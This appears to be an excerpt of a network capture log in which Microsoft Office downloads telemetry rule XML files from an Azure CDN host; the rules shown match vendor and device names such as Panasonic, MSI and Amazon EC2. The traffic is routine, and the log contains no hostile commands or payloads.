                                                                                                                            2024-10-06 11:50:15 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            82192.168.2.64982413.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:15 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:15 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:15 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 478
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                            ETag: "0x8DC582B9B233827"
                                                                                                                            x-ms-request-id: 4dd19665-401e-005b-7705-179c0c000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115015Z-1657d5bbd482lxwq1dp2t1zwkc00000001rg000000005d7r
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:15 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            83192.168.2.64982313.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:15 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:15 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:15 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 423
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                            ETag: "0x8DC582BB7564CE8"
                                                                                                                            x-ms-request-id: a2d01d3c-801e-0083-4800-17f0ae000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115015Z-1657d5bbd48xdq5dkwwugdpzr0000000029g000000005ub8
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:15 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            84192.168.2.64982213.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:15 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:18 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:18 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 486
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                            ETag: "0x8DC582B92FCB436"
                                                                                                                            x-ms-request-id: b8f8ddc8-601e-0001-115a-17faeb000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115017Z-1657d5bbd487nf59mzf5b3gk8n00000001fg00000000d06s
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:18 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            85192.168.2.64982113.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:19 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:19 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:19 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 427
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                            ETag: "0x8DC582BA909FA21"
                                                                                                                            x-ms-request-id: a62739ea-301e-005d-6402-17e448000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115019Z-1657d5bbd487nf59mzf5b3gk8n00000001g000000000c6py
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:19 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            86192.168.2.64982513.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:19 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:19 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:19 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 404
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                            ETag: "0x8DC582B95C61A3C"
                                                                                                                            x-ms-request-id: 151ca1e1-401e-0029-2b03-179b43000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115019Z-1657d5bbd482tlqpvyz9e93p5400000001wg00000000h0kz
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:19 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            87192.168.2.64982613.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:19 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:19 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:19 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 468
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                            ETag: "0x8DC582BB046B576"
                                                                                                                            x-ms-request-id: db28b7eb-d01e-0065-5efe-16b77a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115019Z-1657d5bbd48cpbzgkvtewk0wu000000001z000000000bew3
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:19 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            88192.168.2.64982713.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:19 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:19 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:19 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 400
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                            ETag: "0x8DC582BB2D62837"
                                                                                                                            x-ms-request-id: 53f69819-801e-0048-7802-17f3fb000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115019Z-1657d5bbd48cpbzgkvtewk0wu000000001x000000000gg2g
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:19 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            89192.168.2.64982813.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:20 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:20 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:20 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 479
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                            ETag: "0x8DC582BB7D702D0"
                                                                                                                            x-ms-request-id: b2c548d6-d01e-0082-4f03-17e489000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115020Z-1657d5bbd48xlwdx82gahegw40000000022g00000000c70d
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:20 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            90192.168.2.64983213.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:20 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:20 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:20 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 448
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                            ETag: "0x8DC582BB389F49B"
                                                                                                                            x-ms-request-id: 5e879109-c01e-00a2-3e73-172327000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115020Z-1657d5bbd482krtfgrg72dfbtn00000001q0000000007pb9
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:20 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            91192.168.2.64982913.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:20 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:20 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:20 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 425
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                            ETag: "0x8DC582BBA25094F"
                                                                                                                            x-ms-request-id: 7709e3c3-b01e-0097-5e02-174f33000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115020Z-1657d5bbd48brl8we3nu8cxwgn0000000280000000008dm4
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:20 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
